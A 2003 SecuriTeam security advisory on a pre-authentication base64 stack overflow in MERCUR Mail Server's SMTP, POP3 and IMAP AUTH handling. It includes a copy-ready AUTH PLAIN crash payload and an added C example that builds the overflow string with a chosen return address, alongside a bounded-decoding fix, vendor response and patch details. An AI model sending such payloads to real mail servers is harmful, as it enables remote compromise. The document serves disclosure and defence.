[NT] MERCUR Mail Server AUTH Vulnerability (Base64)

From: SecuriTeam (support_at_securiteam.com)
Date: 10/26/03

    To: list@securiteam.com
    Date: 26 Oct 2003 12:26:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      MERCUR Mail Server AUTH Vulnerability (Base64)
    ------------------------------------------------------------------------

    SUMMARY

    MERCUR Mail Server (http://www.atrium-software.com/) "offers the
    necessary features to provide an efficient and effective communications
    medium. These include Security features using IP-Caching Firewall, NORMAN
    Virus Control Engine, and check open relay database by using DNS, Remote
    Configuration via a Web Browser, Dial-Up-connectivity (Modem, ISDN-Card),
    dedicated connectivity (ISDN-Router) or connectivity over the network
    (Router) to your ISP".

    A stack buffer overflow in the base64 decoding routine that MERCUR uses
    for the AUTH command allows remote attackers, before any credentials are
    checked, to execute arbitrary code on the server.

    DETAILS

    Vulnerable systems:
     * MERCUR Mail Server v4.2 SP3 and below

    Immune systems:
     * MERCUR Mail Server v4.2 SP3a

    The vulnerability is in the base64 decoding routine, which never compares
    the size of the decoded output with the size of the destination buffer: it
    decodes and writes the whole supplied string, however long it is. Where the
    destination is a fixed-size buffer on the stack, the overflow overwrites the
    saved EBP and the return address (EIP) of the calling function, which gives
    control of execution and allows remote code execution.

    For the SMTP component, the command I used in the exploit is "AUTH PLAIN
    Base64String". By carefully constructing the buffer to encode ([0x10C
    DATA],[EBP],[EIP]), encoding it and sending it, we trigger the overflow
    and gain control of code execution. Here is the disassembly of the faulty
    call:

        CODE:00424FB8 push eax                 ; length of data
        CODE:00424FB9 lea  edx, [ebp+var_10C]  ; only 0x10C bytes between this buffer and the saved EBP!
        CODE:00424FBF push edx                 ; destination buffer
        CODE:00424FC0 push edi                 ; source buffer
        CODE:00424FC1 call base64_decode

    (Checking the base64 decoding routine itself is left to the reader.)

    One can reproduce the fault by connecting to port 25 of the server (with
    the telnet client of Windows 2000 or XP; a UNIX telnet client results in the
    connection being closed) and sending the following command on a single line
    (the base64 argument is wrapped here for readability):

    AUTH PLAIN
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
    kJCQkJCQkJCQkJCQkJCQkJCQkJCQ

    The server will then try to execute code at address 0x90909090 and crash.
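    The faulty call and the payload described above, as an added C example
    that is not MERCUR's code and not the advisory's exploit. A `struct frame`
    stands in for the callee's stack frame implied by the disassembly (a
    0x10C-byte buffer, then the saved EBP, then the return address);
    `b64_decode_unbounded` behaves like the `base64_decode` the advisory
    describes and writes whatever the input decodes to, while
    `b64_decode_bounded` is the fix, sizing the output before it writes.
    `build_auth_plain_arg` assembles ([0x10C DATA],[EBP],[EIP]) and
    base64-encodes it; with EBP and EIP both 0x90909090 it reproduces the
    368-character argument shown above. The 0x90 filler, the little-endian
    EBP/EIP layout, the stand-in frame contents and the "\0user\0password"
    credential used as the benign comparison are assumptions made for the
    example:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FILL_LEN 0x10C  /* bytes between the decode buffer and the saved EBP */
/* Stand-in for the callee's stack frame: the buffer, then saved EBP, then EIP. */
struct frame { unsigned char buf[FILL_LEN]; uint32_t saved_ebp; uint32_t ret_addr; };
static const char B64TBL[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* VULNERABLE, modelled on the routine called at CODE:00424FC1: decodes every complete
 * quartet into dst with no idea how large dst is. Returns the number of bytes written. */
static size_t b64_decode_unbounded(const char *src, size_t srclen, unsigned char *dst) {
    size_t out = 0;
    for (size_t i = 0; i + 4 <= srclen; i += 4) {
        unsigned int v = 0;
        int n = 0;                                       /* digits seen in this quartet */
        for (int k = 0; k < 4; k++) {
            const char *p = strchr(B64TBL, src[i + k]);
            if (src[i + k] == '\0' || src[i + k] == '=' || p == NULL) break;
            v |= (unsigned int)(p - B64TBL) << (18 - 6 * k);
            n++;
        }
        if (n > 1) dst[out++] = (unsigned char)(v >> 16);
        if (n > 2) dst[out++] = (unsigned char)(v >> 8);
        if (n > 3) dst[out++] = (unsigned char)v;
        if (n < 4) break;                                /* padding or garbage: stop */
    }
    return out;
}
/* FIXED: work out the decoded size first and refuse anything that would not fit in dst. */
static int b64_decode_bounded(const char *src, size_t srclen, unsigned char *dst, size_t dstsize, size_t *outlen) {
    size_t need;
    if (srclen == 0 || srclen % 4 != 0) return -1;      /* malformed */
    need = srclen / 4 * 3 - (src[srclen - 1] == '=') - (src[srclen - 2] == '=');
    if (need > dstsize) return -1;                      /* would overflow dst */
    *outlen = b64_decode_unbounded(src, srclen, dst);
    return 0;
}
/* Standard base64 encoder with '=' padding; dst needs 4*ceil(srclen/3)+1 bytes. */
static size_t b64_encode(const unsigned char *src, size_t srclen, char *dst) {
    size_t o = 0;
    for (size_t i = 0; i < srclen; i += 3) {
        unsigned int v = (unsigned int)src[i] << 16;
        if (i + 1 < srclen) v |= (unsigned int)src[i + 1] << 8;
        if (i + 2 < srclen) v |= src[i + 2];
        dst[o++] = B64TBL[(v >> 18) & 63];
        dst[o++] = B64TBL[(v >> 12) & 63];
        dst[o++] = (i + 1 < srclen) ? B64TBL[(v >> 6) & 63] : '=';
        dst[o++] = (i + 2 < srclen) ? B64TBL[v & 63] : '=';
    }
    dst[o] = '\0';
    return o;
}

/* The advisory's layout ([0x10C DATA],[EBP],[EIP]): 0x90 filler (assumed), then EBP and
 * EIP little-endian, base64-encoded into out (which needs at least 369 bytes). */
static size_t build_auth_plain_arg(char *out, uint32_t ebp, uint32_t eip) {
    unsigned char raw[sizeof(struct frame)];
    memset(raw, 0x90, FILL_LEN);
    for (int i = 0; i < 4; i++) {
        raw[FILL_LEN + i]     = (unsigned char)(ebp >> (8 * i));
        raw[FILL_LEN + 4 + i] = (unsigned char)(eip >> (8 * i));
    }
    return b64_encode(raw, sizeof raw, out);
}
/* The argument exactly as printed in the advisory (its wrapped lines joined). */
static const char ADVISORY_ARG[] =
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ"
    "kJCQkJCQkJCQkJCQkJCQkJCQkJCQ";
/* 1 if EBP = EIP = 0x90909090 reproduces the advisory's argument byte for byte. */
static int payload_matches_advisory(void) {
    char arg[4 * ((sizeof(struct frame) + 2) / 3) + 1];
    return build_auth_plain_arg(arg, 0x90909090u, 0x90909090u) == strlen(ADVISORY_ARG)
        && strcmp(arg, ADVISORY_ARG) == 0;
}

/* Vulnerable decode into a frame: dst aliases f.buf at offset 0, so the bytes past
 * FILL_LEN overwrite saved_ebp and ret_addr. Returns the EIP the callee would return to. */
static uint32_t ret_addr_after_unbounded(const char *arg) {
    struct frame f = { {0}, 0x0012ff80u, 0x00401000u };  /* stand-in frame contents */
    b64_decode_unbounded(arg, strlen(arg), (unsigned char *)&f);
    return f.ret_addr;
}
/* Same argument through the fixed routine: decoded length, or -1 if it was refused. */
static long bounded_decoded_len(const char *arg) {
    struct frame f; size_t n;
    return b64_decode_bounded(arg, strlen(arg), f.buf, sizeof f.buf, &n) == 0 ? (long)n : -1;
}

int main(void) {
    printf("reproduces advisory argument: %d, unbounded EIP: 0x%08x, bounded: %ld / %ld\n",
           payload_matches_advisory(), (unsigned)ret_addr_after_unbounded(ADVISORY_ARG),
           bounded_decoded_len(ADVISORY_ARG), bounded_decoded_len("AHVzZXIAcGFzc3dvcmQ="));
    return 0;  /* the last argument is "\0user\0password", a constructed benign credential */
}
```

    Decoding the advisory's argument into the frame leaves the return address at
    0x90909090, the value the advisory says the server tries to execute, while the
    bounded routine refuses the same 276-byte result for a 268-byte buffer and still
    decodes an ordinary 14-byte AUTH PLAIN credential. Comparing the decoded size with
    the destination before writing is the whole of the fix; this is an illustration of
    that class of fix, not the vendor's code.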

    The vulnerability is also present in the POP3 module ("AUTH PLAIN" command)
    and in the IMAP module ("AUTHENTICATE PLAIN" command).

    Vendor Response:
    The vendor was contacted on October 7th, 2003.

    Stefan Sigmund from atrium software international responded to Kostya's
    initial query:

    "We are able to duplicate the problem with POP3 and IMAP4, but not with
    SMTP. All three services contain a special buffer-checking feature. Very
    long commands will be blocked and the connection will be closed
    immediately. It seems that this feature works well in the SMTP part.

    However, we are going to create a patch for that issue. But, we need to
    make sure that everything is working well."

    Solution:
    Upgrade to MERCUR Mailserver Version 4.2 - Service Pack 3a, available since
    October 20th, 2003. See also:
    http://www.atrium-software.com/mail%20server/pub/mcr42sp3a.html
    http://www.atrium-software.com/download/mercur%20service%20pack.exe

    ADDITIONAL INFORMATION

    The information has been provided by Kostya KORTCHINSKY
    (kostya.kortchinsky@renater.fr).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

